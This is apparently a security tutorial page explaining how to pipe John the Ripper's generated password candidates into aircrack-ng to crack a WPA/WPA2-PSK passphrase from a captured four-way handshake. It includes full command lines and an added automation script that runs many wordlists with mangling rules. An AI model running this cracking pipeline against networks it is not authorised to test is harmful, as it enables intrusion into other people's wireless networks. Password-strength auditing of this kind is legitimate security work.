Aircrack and John the Ripper
From charlesreid1
What is Aircrack
We have met Aircrack before: the aircrack-ng suite captures wireless traffic and recovers a network's key from it. For WEP that is a statistical attack on captured packets; for WPA/WPA2-PSK it means capturing the four-way handshake and then guessing the passphrase against it, which is a dictionary attack rather than a true brute force. Supplying the guesses, once you have the handshake, is where John can help.
What is John
John the Ripper is a password cracker aimed at weak passwords on user accounts. Besides cracking hashes itself, it is good at generating candidate passwords: words from a wordlist, mangled variants of those words (case changes, appended digits, and so on), or exhaustive character combinations.
You can use John together with Aircrack by telling John to print every candidate it would have tried to stdout, and using that stream as the aircrack-ng wordlist. This lets John crank away on generating guesses while aircrack-ng does the WPA key derivation for each one. There are certainly faster ways to do it, but this is a quick check for weak passphrases.
Getting Set Up
To use Aircrack with John, you'll need to make sure you have both installed. If you're on Kali you're good to go.
John Modes
You can use John in multiple different modes, and depending on the mode, you'll either be waiting a few minutes, or a few years. Choose wisely.
Incremental All Mode (Exhaustive)
If you call John with the --incremental=All flag, that specifies incremental mode, which works through every character combination, ordered by how likely each one is. (Mode names are case-sensitive and come from the [Incremental:...] sections of john.conf, so check which ones your build defines; plain --incremental uses the default.) This means we don't have to supply a wordlist, but it also means we're going to be coming up with a lot of garbage guesses, and the search will not finish in practical time for anything but short passphrases. Keep in mind that a WPA passphrase is 8 to 63 characters long, so every candidate shorter than 8 characters is wasted work.
Specifying a Wordlist
If you want to specify a wordlist for John to use (like one of the many fantastic password lists in this GitHub repo: https://github.com/danielmiessler/SecLists), you can do so with the -w flag (short for --wordlist):
-w=password.lst
Without --rules, John simply replays the list as-is; add --rules to have it also emit mangled variants of each word, which is where most of John's value over a plain wordlist comes from.
John-Aircrack Command
There is no "final" John-to-Aircrack command, at least not until the passphrase is cracked.
The first one I tried looked like this:
$ john -w=10_million_password_list_top_1000.txt --session=attack1 --stdout | aircrack-ng -a 2 -e ASDF asdf-01.cap -w -
Let's go through this one bit at a time:
--session=attack1: this tells John to keep track of where it is in the process and which passwords it has guessed, which makes it possible to resume with --restore=attack1 if the process dies or is interrupted.
--stdout: print all words that John would have otherwise tried itself to stdout, so that some other program can use them
-a 2: this forces the attack mode to WPA-PSK (mode 1 is WEP). It covers both WPA and WPA2 personal, since both derive the key from the passphrase and network name the same way.
-e ASDF: this is the name of the wireless network whose WPA passphrase we're trying to crack
asdf-01.cap: this is the capture file written by our earlier airodump-ng run. It must contain a complete WPA four-way handshake for the target network; aircrack-ng reports whether it found one before it starts testing passphrases, and stops if it didn't.
-w -: the -w flag specifies a wordlist, and - by itself means stdin, so aircrack-ng reads John's generated words from the pipe as its wordlist.
Using Multiple Wordlists with John the Ripper
You can combine xargs with John to use one wordlist at a time:
$ ls ~/wordlists/*.txt | xargs -t -I% john --session=attack1 --wordlist=% [etc..... ]
So to put it all together: we will issue a one-line command. It will iterate through each wordlist in a given directory. For each wordlist, it will run John with that wordlist, and John will print a variety of words to try based on that wordlist. That output is then piped to Aircrack. Two details make this work: xargs -t echoes each command to stderr, so the trace never pollutes the pipe, and aircrack-ng is started only once, so it parses the handshake once and sees all the wordlists as one continuous stream. Note that reusing --session=attack1 for every John run means only the wordlist that was in progress when you interrupted can be resumed; the xargs loop itself will not pick up where it left off.
$ ls ~/wordlists/*.txt | xargs -t -I% john --session=attack1 --wordlist=% --stdout | aircrack-ng -a 2 -e ASDF asdf-01.cap -w -
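As an added example (not code from the original page, nor from the John the Ripper or aircrack-ng projects), here is the whole procedure from the wordlist section and the multi-wordlist pipeline wrapped in a shell script: one John run per wordlist with --rules turned on, a separate restorable session per wordlist, and a filter that drops candidates outside WPA's 8 to 63 character range before they reach aircrack-ng. The ESSID ASDF, the capture file asdf-01.cap and the ~/wordlists directory are placeholder names just as on this page. The filter and naming helpers run without john or aircrack-ng installed; the attack itself needs both on PATH.

```shell
#!/usr/bin/env bash
# Added example, not code from the original page. Wraps the John -> aircrack-ng
# pipeline in a script: one John run per wordlist, --rules enabled, a separate
# restorable session per wordlist, and a length filter so that candidates
# that cannot be a WPA-PSK passphrase never reach aircrack-ng.
# Assumed (placeholder) names: ESSID ASDF, capture asdf-01.cap, ~/wordlists/*.txt.

# Keep only candidates of 8..63 characters; WPA-PSK allows nothing else,
# so shorter or longer lines are wasted PBKDF2 work inside aircrack-ng.
wpa_len_filter() {
    awk 'length($0) >= 8 && length($0) <= 63'
}

# How many candidates in a stream would actually be tested. Useful for a
# quick look at a wordlist before committing hours to it.
count_usable() {
    wpa_len_filter | wc -l | tr -d ' '
}

# Session name derived from the wordlist, so each run can be resumed with
# "john --restore=<name>" independently of the others.
session_name() {
    printf 'attack-%s' "$(basename "$1" .txt)"
}

# Emit John's candidates for one wordlist. --rules adds the mangled variants
# (case changes, appended digits, ...) that a plain wordlist would miss.
john_stream() {
    john --wordlist="$1" --rules --session="$(session_name "$1")" --stdout
}

# Run John over every wordlist in a directory and pipe the combined stream
# through the filter into a single aircrack-ng process, which parses the
# handshake once and then tests each candidate as it arrives.
run_attack() {
    essid=$1; capture=$2; dir=$3
    set -- "$dir"/*.txt          # glob instead of `ls | xargs`: safe with odd names
    [ -e "$1" ] || { echo "no .txt wordlists in $dir" >&2; return 1; }
    for f in "$@"; do
        echo "== $f ==" >&2      # progress goes to stderr, never into the pipe
        john_stream "$f"
    done | wpa_len_filter | aircrack-ng -a 2 -e "$essid" "$capture" -w -
}

# Usage: john2air.sh ASDF asdf-01.cap ~/wordlists
# The attack only runs when all three arguments are given, so the helpers
# above can be sourced or tested on a box without john/aircrack-ng.
if [ "$#" -eq 3 ]; then
    command -v john >/dev/null 2>&1 && command -v aircrack-ng >/dev/null 2>&1 \
        || { echo "john and aircrack-ng must be on PATH" >&2; exit 1; }
    run_attack "$1" "$2" "$3"
fi
```

The glob loop replaces ls | xargs so that filenames with unusual characters and an empty directory are handled cleanly, and the length filter sits between John and aircrack-ng because aircrack-ng's per-candidate cost (PBKDF2 with 4096 iterations) is far higher than John's cost of generating a guess, so dropping impossible candidates early is pure gain.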